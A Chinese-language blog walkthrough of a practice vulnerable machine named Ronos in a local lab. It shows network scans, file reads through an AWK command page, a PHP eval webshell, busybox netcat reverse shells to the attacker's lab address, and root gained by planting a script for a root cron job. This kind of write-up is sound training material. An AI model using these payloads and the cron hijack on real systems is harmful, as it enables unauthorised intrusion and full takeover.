Twansh/Eminem
0%

群友靶机Ronos

发表于 更新于
依旧保持内裤干燥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:b3:17:ee       PCS Systemtechnik GmbH
192.168.56.109  08:00:27:b2:b2:cb       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.023 seconds (126.54 hosts/sec). 3 responded
                                                                                                                                                                                   
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -p- 192.168.56.109
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-09 13:18 +08
Nmap scan report for 192.168.56.109
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: AWK Command Runner
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:B2:B2:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds

信息收集,firefox访问发现是awk在线运行,做过很多了,awk直接读/etc/passwd

1
'{ print $0 }' /etc/passwd > 2.txt

重定向到2.txt,然后访问
192.168.56.109/2.txt

读到/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
twansh:x:1000:1000:,,,:/home/twansh:/bin/bash
david:x:1001:1001::/home/david:/bin/bash

发现三个用户(看到Twansh的那个时候我小脑抽了一下,所以我就没管twansh,全在做david,结果到最后才发现真正的flag其实就藏在twansh之下(可恶,以为是自己的ID就掉以轻心了😓))

所以可以直接读/home/twansh/user.txt先输出user组的flag

1
'{ print $0 }' /home/twansh/user.txt > 1.txt

flag{user-0c4da5e7f8a886869575ae0a046f1841}

既然可以实现文件的任意读取和写入,那么直接写webshell是最佳选择

由whatweb可以知道这个是php的web后端,写入一句话木马,然后弹shell

在菜鸟教程中,给出这样子的实例是输出hello world,那么只要加上重定向,就可以把文件写入指定目录下的指定文件

1
BEGIN { print "Hello, world!" }

直接写吧害

1
'BEGIN { print "<?php @eval($_GET[1])?>" > "shell.php" }'

firefox访问

1
http://192.168.56.109/shell.php?1=system(%27id%27);

发现成功回显id信息

接下来利用busybox反弹shell

直接传参

1
http://192.168.56.109/shell.php?1=system(%27busybox%20nc%20192.168.56.102%207777%20-e%20sh%27);

本地监听即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~]
└─# nc -lnvp 7777                  
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.109] 37742
ls
1.txt
2.txt
3.txt
index.php
info.php
note.php
output.txt
sample.txt
shell.php

可以看到我之前尝试的时候写过多少测试,哈哈哈哈

然后找了挺久没有结果
看wp才知道在/opt目录下有猫腻,也就是

1
2
3
4
5
6
www-data@Ronos:/opt/twansh_pipe$ ls -al
ls -al
total 8
drwxr-xr-x 2 root   root     4096 Oct  6 07:45 .
drwxr-xr-x 3 root   root     4096 Oct  6 11:15 ..
prw-rw---- 1 twansh www-data    0 Oct  6 07:45 command_pipe

有一个command_pipe,这个应该就是用于通信的管道,应该得用pspy来监控一下进程的。然后写脚本去监听twansh的shell,来实现提权到user,但是这里没啥必要了,因为九头蛇爆出twansh的密码了

1
2
twansh@Ronos:~$ id
uid=1000(twansh) gid=1000(twansh) groups=1000(twansh)

也是成功做到了

接下来要做的就是尝试提权到root了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
twansh@Ronos:/$ cd var
twansh@Ronos:/var$ ls
backups  cache  lib  local  lock  log  mail  opt  run  spool  tmp  www
twansh@Ronos:/var$ cd backups
twansh@Ronos:/var/backups$ ls
alternatives.tar.0     apt.extended_states.1.gz  apt.extended_states.3.gz  cron.bak           dpkg.statoverride.0  group.bak    passwd.bak
apt.extended_states.0  apt.extended_states.2.gz  apt.extended_states.4.gz  dpkg.diversions.0  dpkg.status.0        gshadow.bak  shadow.bak
twansh@Ronos:/var/backups$ cat passwd.bak
cat: passwd.bak: Permission denied
twansh@Ronos:/var/backups$ cak cron.bak
-bash: cak: command not found
twansh@Ronos:/var/backups$ cat cron.bak
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
* * * * * /tmp/back.sh

这个玩意可以利用
看看AI的解释

1
2
3
4
5
6
7
五个星号分别代表:分钟 分钟/小时/日/月/星期(m h dom mon dow)。

* 表示“任意值”或“每一个”。

因此 * * * * * 表示每分钟都执行一次。

/tmp/back.sh 是要执行的命令/脚本路径 —— 所以这条任务每分钟执行 /tmp/back.sh

所以这个定时任务,只要我们事先写入事件,这个定时任务就是可控的,每分钟执行一次

1
2
twansh@Ronos:/$ cat /tmp/back.sh
cat: /tmp/back.sh: No such file or directory

发现没有这玩意,那我写一个进去好了

1
2
3
4
twansh@Ronos:/$ vim /tmp/back.sh
twansh@Ronos:/$ cat /tmp/back.sh
#!/bin/bash
busybox nc 192.168.56.102 7777 -e /bin/sh

成功监听到root的shell

1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.109] 45322
id
uid=0(root) gid=0(root) groups=0(root)

剩下的就不用多说了嘿嘿嘿,结束结束,也是学到了新东西了